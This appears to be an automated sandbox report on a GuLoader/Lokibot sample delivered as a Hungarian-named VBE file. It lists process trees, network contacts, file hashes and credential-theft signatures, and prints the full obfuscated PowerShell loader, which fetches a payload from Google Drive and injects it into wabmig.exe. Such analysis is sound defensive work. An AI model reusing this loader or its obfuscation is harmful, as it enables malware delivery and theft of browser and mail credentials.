';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.16.170.49:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp

Files

memory/2228-4-0x000007FEF57AE000-0x000007FEF57AF000-memory.dmp

memory/2228-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/2228-7-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2228-8-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-9-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-11-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-10-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-13-0x000007FEF57AE000-0x000007FEF57AF000-memory.dmp

memory/2228-14-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MUY8W4GYUVBPBGDJ5YBD.temp

MD5 c00f80b16eb64dad6c0b178c6799af96
SHA1 dfaa542e859d5b658181e0bc2b7f370cdbbefe6b
SHA256 e7554ce12bfd0ac902d3fc7ffa3d05b670e8eaa3a8a94b8cd8d6a6a1cd284030
SHA512 bec6dbe0f8bb0ed9809447c530db33331f8ac99efd55ccecd0aec833318f07a16e4daa4ecfa177f487fadbfe786e2f920787bc61905bc243293b032495e904bb

C:\Users\Admin\AppData\Roaming\Roborate.Uns

MD5 0b4940908143e7fa3180389a9b914557
SHA1 50985967f0dd7d2d8fdac35c66e6c066aba58aaf
SHA256 6e7664ac02af1fef33611b5150c64e285ca5c5bfda5bd555299c6df7b41f4d22
SHA512 eae1f4f22060ae85a31013cf9b904429e914018188eb519135e9ee747ff35b6a6426f665cd61cfb8724908658d11e80deb483901f4357c10cb5d207cb352e299

memory/2592-19-0x0000000006650000-0x00000000099F6000-memory.dmp

memory/2536-20-0x00000000008A0000-0x0000000003C46000-memory.dmp

memory/2536-41-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2228-43-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2536-42-0x00000000008A0000-0x0000000003C46000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1506706701-1246725540-2219210854-1000\0f5007522459c86e95ffcc62f32308f1_62dc4f69-4699-4b35-9f5c-cc69254f52a3

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1506706701-1246725540-2219210854-1000\0f5007522459c86e95ffcc62f32308f1_62dc4f69-4699-4b35-9f5c-cc69254f52a3

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 11:01

Reported

2024-09-17 11:03

Platform

win10v2004-20240802-en

Max time kernel

143s

Max time network

148s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3008 set thread context of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2452 wrote to memory of 4424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2452 wrote to memory of 4424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 4748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 4748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1992 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 1332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Windows\system32\cmd.exe

